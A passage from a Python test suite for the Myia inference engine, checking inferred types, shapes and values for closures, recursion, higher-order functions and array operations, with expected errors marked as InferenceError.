test_prim_tern(x, y, z):\n return _tern(x, y, z)\n\n\n@infer(type=[(i64, i64), (f64, f64), (B, InferenceError)])\ndef test_prim_usub(x):\n return -x\n\n\n@infer_std(type=[\n (i64, InferenceError),\n (f32, f32),\n (f64, f64),\n (af64_of(2, 5), af64),\n (B, InferenceError)\n])\ndef test_prim_log(x):\n return np.log(x)\n\n\n@infer(\n type=[\n (B, f64, f64, f64),\n (B, f64, i64, InferenceError),\n ({'value': True}, f64, i64, f64),\n ({'value': False}, f64, i64, i64),\n # Note: scalar_pipeline will not convert i64 to bool,\n # so the following is an InferenceError even though it\n # will work with the standard_pipeline\n (i64, f64, f64, InferenceError),\n ],\n value=[\n (True, 7, 4, 49),\n (False, 7, 4, 16),\n ({'type': B, 'value': ANYTHING}, 7, 4, ANYTHING),\n ]\n)\ndef test_if(c, x, y):\n if c:\n return x * x\n else:\n return y * y\n\n\n@infer(type=type_signature_arith_bin)\ndef test_if2(x, y):\n if x > y:\n return x\n else:\n return y\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (i64, f64, f64),\n (f64, f64, f64),\n ({'value': 1_000_000}, i64, i64)\n ],\n value=[\n (2, 3, 27),\n (1_000_000, 3, ANYTHING)\n ]\n)\ndef test_while(x, y):\n rval = y\n while x > 0:\n rval = rval * y\n x = x - 1\n return rval\n\n\n@infer(\n type=[\n (li64, i64, i64),\n (li64, f64, InferenceError),\n (i64, i64, InferenceError),\n (T[i64, i64, i64], i64, i64),\n (T[i64, f64, i64], i64, InferenceError),\n ]\n)\ndef test_for(xs, y):\n rval = y\n for x in xs:\n rval = rval + x\n return rval\n\n\n@infer(type=(i64, f64, T[i64, f64]))\ndef test_nullary_closure(x, y):\n def make(z):\n def inner():\n return z\n return inner\n a = make(x)\n b = make(y)\n return a(), b()\n\n\n@infer(type=(i64, f64, T[i64, f64]))\ndef test_merge_point(x, y):\n def mul2():\n return scalar_mul\n m = mul2()\n return m(x, x), m(y, y)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_not_enough_args_prim(x):\n return scalar_mul(x)\n\n\n@infer(type=[(i64, i64, i64, InferenceError)])\ndef test_too_many_args_prim(x, y, z):\n return scalar_mul(x, y, z)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_not_enough_args(x):\n def g(x, y):\n return x * y\n return g(x)\n\n\n@infer(type=[(i64, i64, InferenceError)])\ndef test_too_many_args(x, y):\n def g(x):\n return x * x\n return g(x, y)\n\n\n@infer(type=(i64, f64, T[i64, f64]),\n shape=[(t(i64), t(f64), TupleShape((NOSHAPE, NOSHAPE))),\n (t(T[i64, i64]), t(f64),\n TupleShape((TupleShape((NOSHAPE, NOSHAPE)), NOSHAPE)))])\ndef test_tup(x, y):\n return (x, y)\n\n\n@infer(type=[(i64, i64, L[i64]),\n (i64, f64, InferenceError)],\n shape=[({'type': i64, 'shape': NOSHAPE},\n {'type': i64, 'shape': NOSHAPE},\n ListShape(NOSHAPE)),\n ({'type': L[A[i64]], 'shape': ListShape((8, 3))},\n {'type': L[A[i64]], 'shape': ListShape((4, 3))},\n ListShape(ListShape((ANYTHING, 3)))),\n (ai64_of(4, 7), ai64_of(4, 7), ListShape((4, 7))),\n (ai64_of(4, 7), ai64_of(9, 7), ListShape((ANYTHING, 7)))])\ndef test_list(x, y):\n return [x, y]\n\n\n@infer(type=[(i64, i64, L[i64]),\n (f64, f64, L[f64]),\n (lf64, lf64, InferenceError),\n (i64, f64, InferenceError)])\ndef test_list_and_scalar(x, y):\n return [x, y, 3]\n\n\n@infer(type=[(L[Problem[VOID]],)],\n shape=[(InferenceError,)])\ndef test_list_empty():\n return []\n\n\n@infer(\n type=[\n (T[i64, f64], i64),\n (lf64, InferenceError),\n (af64_of(2, 5), InferenceError),\n (i64, InferenceError),\n ],\n value=[\n ((), 0),\n ((1,), 1),\n ((1, 2), 2),\n ]\n)\ndef test_tuple_len(xs):\n return P.tuple_len(xs)\n\n\n@infer(\n type=[\n (T[i64, f64], InferenceError),\n (lf64, i64),\n (af64_of(2, 5), InferenceError),\n (i64, InferenceError),\n ],\n)\ndef test_list_len(xs):\n return P.list_len(xs)\n\n\n@infer(\n type=[\n (T[i64, f64], InferenceError),\n (lf64, InferenceError),\n (af64_of(2, 5), i64),\n (i64, InferenceError),\n ],\n)\ndef test_array_len(xs):\n return P.array_len(xs)\n\n\n@infer(type=[(T[i64, f64], T[f64]),\n (T[f64, i64], T[i64]),\n (T[()], InferenceError),\n (f64, InferenceError)],\n shape=[(t(T[f64, i64]), TupleShape((NOSHAPE,))),\n (t(T[i64, T[i64, f64]]),\n TupleShape((TupleShape((NOSHAPE, NOSHAPE)),)))])\ndef test_tail_tuple(tup):\n return tail(tup)\n\n\n@infer(type=[(T[i64], T[f64], InferenceError)])\ndef test_tail_tuple_wrong(x, y):\n return tail(x, y)\n\n\n@infer(type=[(i64, f64, i64), (f64, i64, f64)],\n shape=(t(i64), t(f64), NOSHAPE))\ndef test_tuple_getitem(x, y):\n return (x, y)[0]\n\n\n@infer(type=[(i64, f64, f64), (f64, i64, i64)])\ndef test_tuple_getitem_negative(x, y):\n return (x, y)[-1]\n\n\n@infer(type=[(i64, f64, InferenceError)])\ndef test_tuple_outofbound(x, y):\n return (x, y)[2]\n\n\n@infer(type=[(i64, f64, InferenceError)])\ndef test_tuple_outofbound_negative(x, y):\n return (x, y)[-3]\n\n\n@infer(\n type=[\n (li64, i64, i64),\n (lf64, i64, f64),\n (lf64, f64, InferenceError),\n (f64, i64, InferenceError),\n (T[i64, f64], i64, InferenceError)\n ]\n)\ndef test_list_getitem(xs, i):\n return xs[i]\n\n\n@infer(\n type=[\n (T[i64, i64], {'value': 1}, f64, T[i64, f64]),\n (T[i64, i64, f64], {'value': 1}, f64, T[i64, f64, f64]),\n (T[i64], {'value': 1}, f64, InferenceError),\n (T[i64], {'type': f64, 'value': 0}, f64, InferenceError),\n (T[i64], i64, f64, InferenceError),\n ]\n)\ndef test_tuple_setitem(xs, idx, x):\n return tuple_setitem(xs, idx, x)\n\n\n@infer(\n type=[\n (li64, i64, i64, li64),\n (li64, f64, i64, InferenceError),\n (li64, i64, f64, InferenceError),\n ]\n)\ndef test_list_setitem(xs, idx, x):\n return list_setitem(xs, idx, x)\n\n\n@infer(type=(i64, f64, T[i64, f64]))\ndef test_multitype_function(x, y):\n def mul(a, b):\n return a * b\n return (mul(x, x), mul(y, y))\n\n\n@infer(type=type_signature_arith_bin)\ndef test_closure(x, y):\n def mul(a):\n return a * x\n return mul(x) + mul(y)\n\n\n@infer(\n type=[\n (i64, i64, i64, i64, T[i64, i64]),\n (f64, f64, f64, f64, T[f64, f64]),\n (i64, i64, f64, f64, T[i64, f64]),\n (i64, f64, f64, f64, InferenceError),\n (i64, i64, i64, f64, InferenceError),\n ]\n)\ndef test_return_closure(w, x, y, z):\n def mul(a):\n def clos(b):\n return a * b\n return clos\n return (mul(w)(x), mul(y)(z))\n\n\n@infer(type=[(i64, i64), (f64, f64)])\ndef test_fact(n):\n def fact(n):\n if n <= 1:\n return 1\n else:\n return n * fact(n - 1)\n return fact(n)\n\n\ndef even(n):\n if n == 0:\n return True\n else:\n return odd(n - 1)\n\n\ndef odd(n):\n if n == 0:\n return False\n else:\n return even(n - 1)\n\n\n@infer(type=[(i64, B), (f64, B)])\ndef test_even_odd(n):\n return even(n)\n\n\n@infer(type=[(i64, i64), (f64, f64)])\ndef test_pow10(x):\n v = x\n j = 0\n while j < 3:\n i = 0\n while i < 3:\n v = v * x\n i = i + 1\n j = j + 1\n return v\n\n\n@infer(\n type=[\n (i64, i64, i64, i64),\n (i64, f64, f64, f64)\n ]\n)\ndef test_choose_prim(i, x, y):\n\n def choose(i):\n if i == 0:\n return scalar_add\n else:\n return scalar_mul\n\n return choose(i)(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64, InferenceError),\n ({'value': 0}, i64, i64, i64),\n ({'value': 1}, i64, i64, B),\n ]\n)\ndef test_choose_prim_incompatible(i, x, y):\n\n def choose(i):\n if i == 0:\n return scalar_add\n else:\n return scalar_lt\n\n return choose(i)(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64, InferenceError),\n ({'value': 0}, i64, i64, i64),\n ({'value': 1}, i64, i64, B),\n ]\n)\ndef test_choose_incompatible(i, x, y):\n\n def add2(x, y):\n return x + y\n\n def lt2(x, y):\n return x < y\n\n def choose(i):\n if i == 0:\n return add2\n else:\n return lt2\n\n return choose(i)(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (i64, f64, f64)\n ],\n shape=[\n (t(i64), t(i64), NOSHAPE)\n ]\n)\ndef test_choose_indirect(i, x):\n\n def double(x):\n return x + x\n\n def square(x):\n return x * x\n\n def choose(i):\n if i == 0:\n return double\n else:\n return square\n\n return choose(i)(x)\n\n\n@infer(\n type=[\n (i64, i64)\n ]\n)\ndef test_hof(x):\n\n def double(x):\n return x + x\n\n def square(x):\n return x * x\n\n def hof(f, tup):\n return f(tup[0]) + f(tup[1])\n\n return hof(double, (x + 1, x + 2)) + hof(square, (x + 3, x + 4))\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (i64, f64, InferenceError)\n ],\n value=[\n (-1, 3, 36),\n (1, 3, 6),\n ({'type': i64, 'value': ANYTHING}, 3, ANYTHING)\n ]\n)\ndef test_hof_2(c, x):\n\n def identity(x):\n return x\n\n def double(x):\n return x + x\n\n def square(x):\n return x * x\n\n def pick(c):\n if c < 0:\n return square\n elif c == 0:\n return _to_i64\n else:\n return double\n\n def pick2(c, f):\n if c < 0:\n return f\n else:\n return identity\n\n return pick2(c, pick(c))(x + x)\n\n\n@infer(\n type=[\n (i64, T[T[i64, i64], T[B, B]])\n ]\n)\ndef test_hof_3(x):\n\n def double(x):\n return x + x\n\n def is_zero(x):\n return x == 0\n\n def hof(f, tup):\n return (f(tup[0]), f(tup[1]))\n\n return (hof(double, (x + 1, x + 2)), hof(is_zero, (x + 3, x + 4)))\n\n\n@infer(\n type=[\n (i64, i64, InferenceError),\n ({'value': -1}, i64, i64),\n ({'value': 1}, i64, T[i64, i64]),\n ]\n)\ndef test_hof_4(x, y):\n\n def double(x):\n return x + x\n\n def hof_sum(f, tup):\n return f(tup[0]) + f(tup[1])\n\n def hof_tup(f, tup):\n return (f(tup[0]), f(tup[1]))\n\n def pick(x):\n if x < 0:\n return hof_sum\n else:\n return hof_tup\n\n f = pick(x)\n return f(double, (y + 3, y + 4))\n\n\n@infer(\n type=[\n (B, B, i64, i64, i64),\n (B, B, f64, f64, InferenceError),\n ({'value': True}, B, Nil, i64, i64),\n (B, {'value': True}, f64, f64, f64),\n (B, {'value': True}, i64, f64, InferenceError),\n ]\n)\ndef test_hof_5(c1, c2, x, y):\n\n def pick_hof(c):\n def hof_1(f):\n def wrap(x, y):\n return f(y)\n return wrap\n\n def hof_2(f):\n def wrap(x, y):\n return f(x)\n return wrap\n\n if c:\n return hof_1\n else:\n return hof_2\n\n def pick_f(c):\n if c:\n return scalar_usub\n else:\n return _to_i64\n\n return pick_hof(c1)(pick_f(c2))(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64)\n ]\n)\ndef test_func_arg(x, y):\n def g(func, x, y):\n return func(x, y)\n\n def h(x, y):\n return x + y\n return g(h, x, y)\n\n\n@infer(\n type=[\n (i64, InferenceError)\n ]\n)\ndef test_func_arg3(x):\n def g(func, x):\n z = func + x\n return func(z)\n\n def h(x):\n return x\n\n return g(h, x)\n\n\n@infer(\n type=[\n (i64, i64),\n (f64, f64),\n ]\n)\ndef test_func_arg4(x):\n def h(x):\n return x\n\n def g(fn, x):\n return fn(h, x)\n\n def t(fn, x):\n return fn(x)\n\n return g(t, x)\n\n\n@infer(type=(i64,), value=(4,))\ndef test_closure_deep():\n def g(x):\n def h():\n return x * x\n return h\n return g(2)()\n\n\n@infer(\n type=[\n (i64, i64, i64)\n ],\n value=[\n (5, 7, 15)\n ]\n)\ndef test_closure_passing(x, y):\n def adder(x):\n def f(y):\n return x + y\n return f\n\n a1 = adder(1)\n a2 = adder(2)\n\n return a1(x) + a2(y)\n\n\n@infer(type=[(B, B), (i64, InferenceError)])\ndef test_not(x):\n return not x\n\n\n@infer(value=[(2, 2, 8), (2, 3, 13)])\ndef test_cover_limitedvalue_eq(x, y):\n\n def square(x):\n return x * x\n\n return square(x) + square(y)\n\n\n@infer(\n type=[\n (li64, lf64, T[li64, lf64]),\n (li64, f64, InferenceError),\n ]\n)\ndef test_list_map_prim(xs, ys):\n\n def square(x):\n return x * x\n\n return list_map_prim(square, xs), list_map_prim(square, ys)\n\n\n@infer(\n type=[\n (li64, li64, li64),\n (li64, lf64, InferenceError),\n ]\n)\ndef test_list_map_prim2(xs, ys):\n\n def mulm(x, y):\n return x * -y\n\n return list_map_prim(mulm, xs, ys)\n\n\n@infer(\n type=[(i64, B)],\n value=[(t(i64), True),\n (t(f64), False)]\n)\ndef test_hastype_simple(x):\n return hastype(x, i64)\n\n\n@infer(\n type=[\n (i64, i64, InferenceError),\n (i64, {'type': TypeType, 'value': Int[64]}, B),\n ],\n value=[\n ({'type': i64, 'value': ANYTHING},\n {'type': TypeType, 'value': ANYTHING}, InferenceError),\n ({'type': i64, 'value': ANYTHING},\n {'type': TypeType, 'value': i64}, {'value': True}),\n ({'type': f64, 'value': ANYTHING},\n {'type': TypeType, 'value': i64}, {'value': False}),\n ({'type': T[i64, i64], 'value': ANYTHING},\n {'type': TypeType, 'value': T[i64, i64]}, {'value': True}),\n ({'type': T[i64, i64], 'value': ANYTHING},\n {'type': TypeType, 'value': T[Number, Number]}, {'value': True}),\n ]\n)\ndef test_hastype(x, y):\n return hastype(x, y)\n\n\n@infer(\n type=[(i64, TypeType)],\n value=[(t(i64), i64),\n (t(f64), f64)]\n)\ndef test_typeof(x):\n return typeof(x)\n\n\nTf4 = T[f64, f64, f64, f64]\n\n\n@infer(\n type=[\n (i64, i64),\n (f64, i64),\n (ai64_of(2, 5), f64),\n (af64_of(2, 5), i64),\n (T[i64, i64], i64),\n (T[f64, f64, i64, i64], i64),\n (Tf4, Tf4),\n (T[i64, T[f64, i64]], i64),\n (li64, f64),\n (T[i64, li64], i64),\n (Point_t, i64),\n (Point3D_t, i64),\n (Thing_ftup, T[f64, f64]),\n (Thing_f, i64),\n ],\n value=[\n (5, 5),\n (6.0, 6),\n ((5, 7, (3.2, 1.8)), 16),\n (Point(5, 7), 35),\n (Point3D(5, 7, 9), 0),\n ]\n)\ndef test_hastype_2(x):\n\n def f(x):\n if hastype(x, i64):\n return x\n elif hastype(x, f64):\n return f(_to_i64(x))\n elif hastype(x, ai64):\n return 0.0\n elif hastype(x, Point_t):\n return f(x.x) * f(x.y)\n elif hastype(x, Nil):\n return 0\n elif hastype(x, Tf4):\n return x\n elif hastype(x, T):\n return f(x[0]) + f(tail(x))\n elif hastype(x, L):\n return 1.0\n elif hastype(x, Thing_ftup):\n return x.contents\n else:\n return 0\n\n return f(x)\n\n\n@infer_std(\n type=[\n (li64, i64, li64),\n (lf64, i64, InferenceError),\n ({'type': L[ai64], 'shape': ListShape((2, 3))}, i64, L[ai64]),\n ],\n shape=[(t(li64), t(i64), ListShape(NOSHAPE)),\n ({'type': L[ai64], 'shape': ListShape((2, 3))}, ai64_of(2, 3),\n ListShape((2, 3)))]\n)\ndef test_map_2(xs, z):\n\n def adder(x):\n def f(y):\n return x + y\n return f\n\n return list_map_prim(adder(z), xs)\n\n\ndef _square(x):\n return x * x\n\n\n@infer(type=(InferenceError,))\ndef test_nonexistent_variable():\n return xxxx + yz # noqa\n\n\nclass helpers:\n add = operator.add\n mul = operator.mul\n square = _square\n\n\nclass data:\n a25 = np.ones((2, 5))\n\n\n@infer(\n type=[\n (i64, i64, T[i64, i64]),\n (i64, f64, InferenceError),\n ],\n value=[\n (2, 3, (5, 36))\n ]\n)\ndef test_getattr(x, y):\n a = helpers.add(x, y)\n b = helpers.mul(x, y)\n c = helpers.square(b)\n return a, c\n\n\n@infer(\n type=[\n (i64, i64, T[i64, i64]),\n (i64, f64, T[i64, f64]),\n ]\n)\ndef test_getattr_multitype(x, y):\n a = helpers.add(x, x)\n b = helpers.add(y, y)\n return a, b\n\n\n@infer(\n shape=[\n ((2, 5),),\n ]\n)\ndef test_getattr_shape():\n return data.a25\n\n\n_getattr = getattr\n\n\n@infer(\n type=[\n ({'value': 'add'}, i64, i64),\n ({'value': 'bad'}, i64, InferenceError),\n ({'value': 1234}, i64, InferenceError),\n (External[str], i64, InferenceError),\n ]\n)\ndef test_getattr_flex(name, x):\n return _getattr(helpers, name)(x, x)\n\n\n@infer(type=[\n (External[SimpleNamespace],\n {'type': External[str], 'value': 'surprise'},\n InferenceError)\n])\ndef test_unknown_data(data, field):\n return _getattr(data, field)\n\n\n@infer(type=[(i64, i64, i64), (f64, f64, f64)])\ndef test_method(x, y):\n return x.__add__(y)\n\n\n@infer(type=[(i64, i64, InferenceError)])\ndef test_unknown_method(x, y):\n return x.unknown(y)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_infinite_recursion(x):\n def ouroboros(x):\n return ouroboros(x - 1)\n\n return ouroboros(x)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_indirect_infinite_recursion(x):\n def ouroboros(x):\n if x < 0:\n return ouroboros(x - 1)\n else:\n return ouroboros(x + 1)\n\n return ouroboros(x)\n\n\ndef ping():\n return pong()\n\n\ndef pong():\n return ping()\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_infinite_mutual_recursion(x):\n return ping()\n\n\n@infer(type=[({'shape': (2, 3), 'type': ai16}, T[u64, u64])],\n value=[({'shape': (2, 3), 'type': ai16}, (2, 3)),\n ({'shape': (2, ANYTHING), 'type': ai16}, ANYTHING)])\ndef test_shape(ary):\n return shape(ary)\n\n\n@infer(shape=[\n ({'value': Point(2, 3)}, ClassShape({'x': NOSHAPE, 'y': NOSHAPE})),\n ({'value': [np.ones((2, 3)), np.ones((2, 3))]}, ListShape((2, 3))),\n ({'value': [np.ones((2, 2)), np.ones((2, 3))]}, ListShape((2, ANYTHING))),\n])\ndef test_shape2(val):\n return val\n\n\n@infer(shape=[(af64_of(2, 3),\n af64_of(3, 4), (2, 4)),\n (af64_of(2),\n af64_of(3, 4), InferenceError),\n (af64_of(2, 2),\n af64_of(3, 4), InferenceError)],\n type=[(af64_of(2, 3),\n af64_of(3, 4), af64)])\ndef test_dot(a, b):\n return dot(a, b)\n\n\n@infer(shape=[(ai32_of(4), {'type': T[u64, u64], 'value': (2, 4)}, (2, 4)),\n (ai32_of(4),\n {'type': T[u64, u64]},\n (ANYTHING, ANYTHING)),\n (ai32_of(4),\n {'type': T[u64, u64], 'value': (5, 2)},\n InferenceError),\n ({'type': ai32, 'shape': (4, 2)},\n {'type': T[u64], 'value': (4,)},\n InferenceError)],\n type=[\n (i32, {'value': (4,), 'type': T[u64]}, InferenceError),\n (ai32_of(1), {'value': (4,), 'type': T[u64]}, ai32),\n (li32, {'value': (4,), 'type': T[u64]}, InferenceError),\n (i32, {'value': (4,)}, InferenceError)\n ])\ndef test_distribute(v, shp):\n return distribute(v, shp)\n\n\n@infer(type=[(ai32_of(3, 7), ai32)],\n shape=[(ai32_of(3, 7), (3, 7)),\n (ai32_of(7), (3, 7)),\n (ai32_of(1), (3, 7)),\n (ai32_of(1, 7), (3, 7)),\n (ai32_of(3), InferenceError)])\ndef test_distribute2(v):\n return distribute(v, (3, 7))\n\n\n@infer(shape=[(af16_of(1, 2, 3), {'type': T[u64], 'value': (6,)}, (6,)),\n (af16_of(1, 2, 3), {'type': T[u64]},\n (ANYTHING,)),\n (af16_of(2, 3), {'type': T[u64], 'value': (7,)},\n InferenceError)],\n type=[(af16_of(2, 3), T[u64], af16),\n (af16_of(2, 3), T[i64],\n InferenceError)])\ndef test_reshape(v, shp):\n return reshape(v, shp)\n\n\n@infer(shape=[(af16_of(6, 7),\n {'type': T[u64, u64], 'value': (1, 0)},\n (7, 6)),\n (af16_of(6, 7),\n {'type': T[u64, u64], 'value': (0, 1)},\n (6, 7)),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64, u64], 'value': (2, 0, 1)},\n (5, 3, 4)),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64, u64]},\n (ANYTHING, ANYTHING, ANYTHING)),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64], 'value': (1, 0)},\n InferenceError),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64], 'value': (1, 0)},\n InferenceError),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64], 'value': (1, 2, 9)},\n InferenceError)],\n type=[(af16_of(2, 3), T[u64, u64], af16),\n (af16_of(2, 3), T[i64, i64], InferenceError)])\ndef test_transpose(v, perm):\n return transpose(v, perm)\n\n\n@infer(shape=[({'type': af32, 'shape': (3, 4)}, (3, 4))],\n type=[({'type': ai64, 'shape': (3, 4)}, ai64),\n ({'type': i64}, InferenceError)])\ndef test_array_map(ary):\n def f(v):\n return v + 1\n return array_map(f, ary)\n\n\n@infer(shape=[(af32_of(3, 4), af32_of(3, 4), (3, 4)),\n (af32_of(3, 4), af32_of(3, 7), InferenceError),\n (af32_of(3, ANYTHING), af32_of(ANYTHING, 7), (3, 7)),\n (af32_of(3, ANYTHING), af32_of(ANYTHING, ANYTHING),\n (3, ANYTHING)),\n (af32_of(3, 4, 5), af32_of(3, 4), InferenceError)],\n type=[(ai64_of(7, 9), ai64_of(7, 9), ai64),\n (ai64_of(7, 9), i64, InferenceError),\n (i64, ai64_of(7, 9), InferenceError)])\ndef test_array_map2(ary1, ary2):\n def f(v1, v2):\n return v1 + v2\n return array_map(f, ary1, ary2)\n\n\n@infer(type=[(InferenceError,)])\ndef test_array_map0():\n def f():\n return 1\n return array_map(f)\n\n\n@infer(shape=[(af32_of(3, 4), af32_of(3, 4), af32_of(3, 4), (3, 4)),\n (af32_of(3, 4), af32_of(3, 4), af32_of(3, 7), InferenceError),\n (af32_of(3, ANYTHING, 5, 6),\n af32_of(3, 4, 5, ANYTHING),\n af32_of(ANYTHING, ANYTHING, ANYTHING, 6),\n (3, 4, 5, 6)),\n (af32_of(3, ANYTHING, 5, 6),\n af32_of(3, 4, 5, ANYTHING),\n af32_of(ANYTHING, ANYTHING, ANYTHING, 7),\n InferenceError),\n (af32_of(3, 4, 5), af32_of(3, 4), af32_of(3, 4),\n InferenceError)],\n type=[(ai64_of(7, 9), ai64_of(7, 9), ai64_of(7, 9), ai64),\n (ai64_of(7, 9), ai64_of(7, 9), i64, InferenceError),\n (i64, ai64_of(7, 9), ai64_of(7, 9), InferenceError)])\ndef test_array_map3(ary1, ary2, ary3):\n def f(v1, v2, v3):\n return v1 + v2 + v3\n return array_map(f, ary1, ary2, ary3)\n\n\n@infer(shape=[(ai64_of(3, 4), {'value': 1, 'type': u64}, (3, 4))],\n type=[\n (ai64_of(3, 4), {'value': 1, 'type': u64}, ai64),\n ({'type': i64}, {'value': 1, 'type': u64}, InferenceError),\n (af32_of(3, 4), {'value': 1, 'type': u64},\n InferenceError),\n (ai64_of(3, 4), {'value': 1}, InferenceError)\n ])\ndef test_array_scan(ary, ax):\n def f(a, b):\n return a + b\n return array_scan(f, 0, ary, ax)\n\n\n@infer(\n type=[\n (ai64_of(7, 9), T[u64, u64], ai64),\n (ai64_of(7, 9), i64, InferenceError),\n (i64, T[u64, u64], InferenceError),\n ],\n shape=[\n (ai64_of(3, 4),\n {'type': T[u64, u64], 'value': (3, 1)},\n (3, 1)),\n\n (ai64_of(3, 4),\n {'type': T[u64, u64], 'value': (3, ANYTHING)},\n (3, ANYTHING)),\n\n (ai64_of(3, 4),\n {'type': T[u64, u64, u64], 'value': (3, 1, 1)},\n InferenceError),\n\n (ai64_of(3, 4),\n {'type': T[u64, u64], 'value': (4, 1)},\n InferenceError),\n\n (ai64_of(3, 4),\n {'type': T[u64], 'value': (4,)},\n (4,)),\n\n (ai64_of(3, 4),\n {'value': ()},\n ()),\n ]\n)\ndef test_array_reduce(ary, shp):\n def f(a, b):\n return a + b\n return array_reduce(f, ary, shp)\n\n\n@infer_std(\n type=[\n (L[i64], i64, i64),\n (L[i64], f64, InferenceError),\n ],\n shape=[\n ({'type': L[A[i64]], 'shape': ListShape((6, 7))},\n ai64_of(6, 7),\n (6, 7)),\n ({'type': L[A[i64]], 'shape': ListShape((6, 7))},\n ai64_of(6, 17),\n InferenceError)\n ]\n)\ndef test_list_reduce(lst, dflt):\n def f(a, b):\n return a + b\n return list_reduce(f, lst, dflt)\n\n\n@infer(type=[(i64, i64)],\n value=[(40, 42)],\n shape=[({'type': i64}, NOSHAPE)])\ndef test_partial_1(x):\n def f(a, b):\n return a + b\n f2 = myia_partial(f, 2)\n return f2(x)\n\n\n@infer(type=[(i64, i64)])\ndef test_partial_2(x):\n def f(a, b):\n return a + b\n\n def g(c):\n f2 = myia_partial(f, 2)\n f3 = myia_partial(f, -2)\n if c:\n return f2\n else:\n return f3\n return g(x < 42)(x)\n\n\n@infer(type=[(i64, i64)],\n shape=[(ai64_of(6, 13), (6, 13))])\ndef test_identity_function(x):\n return identity(x)\n\n\n@infer(type=[(B, B, B),\n (i64, B, InferenceError),\n (B, i64, InferenceError)])\ndef test_bool_and(x, y):\n return bool_and(x, y)\n\n\n@infer(type=[(B, B, B),\n (i64, B, InferenceError),\n (B, i64, InferenceError)])\ndef test_bool_or(x, y):\n return bool_or(x, y)\n\n\n@infer(\n type=[\n (B, i64, i64, i64),\n (i64, i64, i64, InferenceError),\n (B, i64, f64, InferenceError),\n ({'value': True}, i64, f64, i64),\n ({'value': False}, i64, f64, f64),\n ],\n value=[\n (True, 1, 2, 1),\n (False, 1, 2, 2),\n ({'type': B, 'value': ANYTHING}, 1, 2, ANYTHING),\n ],\n shape=[\n ({'type': B},\n ai64_of(6, 13),\n ai64_of(6, 13),\n (6, 13)),\n\n ({'type': B},\n ai64_of(6, 13),\n ai64_of(6, 14),\n InferenceError),\n\n ({'type': B, 'value': True},\n ai64_of(6, 13),\n ai64_of(6, 14),\n (6, 13)),\n\n ({'type': B, 'value': False},\n ai64_of(6, 13),\n ai64_of(6, 14),\n (6, 14)),\n ]\n)\ndef test_switch(c, x, y):\n return switch(c, x, y)\n\n\n@infer(\n type=[(B, i64, i64)]\n)\ndef test_closure_in_data(c, x):\n def f(x):\n return x * x\n\n def g(x):\n return x + x\n\n a = Thing((1, [f]))\n b = Thing((2, [g]))\n i, h = switch(c, a, b).contents\n return h[0](x)\n\n\n@infer(\n type=[\n (i64, {'value': i64}, i64),\n (i64, {'value': i16}, i16),\n (f64, {'value': i16}, i16),\n (f16, {'value': f32}, f32),\n (f16, TypeType, InferenceError),\n (f16, {'value': B}, InferenceError),\n (B, {'value': f32}, InferenceError),\n ]\n)\ndef test_scalar_cast(x, t):\n return scalar_cast(x, t)\n\n\n@infer(type=[(i64, ai64),\n (f64, af64),\n (af64_of(9, 7), InferenceError),\n (T[i64], InferenceError)],\n shape=[({'type': i64}, ())])\ndef test_scalar_to_array(x):\n return scalar_to_array(x)\n\n\n@infer(type=[(ai64_of(), i64),\n (af64_of(), f64)],\n shape=[(ai64_of(), NOSHAPE),\n (ai64_of(3, 4), InferenceError),\n (ai64_of(1, 1, 1), InferenceError)])\ndef test_array_to_scalar(x):\n return array_to_scalar(x)\n\n\n@infer(type=[\n (T[u64], T[u64], T[u64]),\n (T[u64, u64], T[u64], T[u64, u64]),\n (T[u64], T[u64, u64], T[u64, u64]),\n (T[i64], T[u64], InferenceError),\n (T[u64], T[i64], InferenceError),\n (i64, i64, InferenceError),\n])\ndef test_broadcast_shape(xs, ys):\n return broadcast_shape(xs, ys)\n\n\n@infer(type=[\n (i64, i64, InferenceError),\n (F[[i64], f64], i64, f64),\n (F[[f64], f64], i64, InferenceError),\n])\ndef test_call_argument(f, x):\n return f(x)\n\n\n@pytest.mark.xfail(reason=\"ExplicitInferrer generates incomplete vrefs\")\n@infer(type=[\n (F[[F[[f64], f64]], f64], f64),\n])\ndef test_call_argument_higher_order(f):\n def g(y):\n return y + y\n return f(g)\n\n\n@infer(type=[\n (i64, i16),\n])\ndef test_unif_tricks(x):\n # unif1 is i16 or f32\n # unif2 is i16 or f64\n # a + b requires same type for a and b\n # Therefore unif1 and unif2 are i16\n a = _unif1(x)\n b = _unif2(x)\n return a + b\n\n\n@infer(type=[\n (i64, InferenceError),\n])\ndef test_unif_tricks_2(x):\n # unif1 is i16 or f32\n # Both are possible, so we raise an error due to ambiguity\n a = _unif1(x)\n return a + a\n\n\n@infer(\n value=[\n (2, 3, 4, 90)\n ],\n type=[\n (i64, i64, i64, i64),\n (f64, f64, f64, InferenceError),\n ]\n)\ndef test_multitype(x, y, z):\n return mysum(x) * mysum(x, y) * mysum(x, y, z)\n\n\nmystery = MultitypeGraph('mystery')\n\n\n@mystery.register(ai64, ai64)\ndef _mystery1(x, y):\n return x @ y\n\n\n@mystery.register(af64, af64)\ndef _mystery2(x, y):\n return array_map(scalar_add, x, y)\n\n\n@infer(\n type=[\n (ai64_of(7, 9), ai64_of(9, 2), ai64),\n (af64_of(7, 9), af64_of(7, 9), af64),\n (f64, f64, InferenceError),\n ],\n shape=[\n (ai64_of(2, 5), ai64_of(5, 3), (2, 3)),\n (af64_of(2, 5), af64_of(5, 3), InferenceError),\n (ai64_of(2, 5), ai64_of(2, 5), InferenceError),\n (af64_of(2, 5), af64_of(2, 5), (2, 5)),\n ]\n)\ndef test_multitype_2(x, y):\n return mystery(x, y)\n\n\ndef test_forced_type():\n\n @pipeline_function\n def mod(self, graph):\n # Force the inferred tyoe of the output to be f64\n graph.output.inferred['type'] = f64\n return graph\n\n def fn(x, y):\n return x + y\n\n pip = infer_pipeline.insert_before('infer', mod=mod)\n\n for argspec in 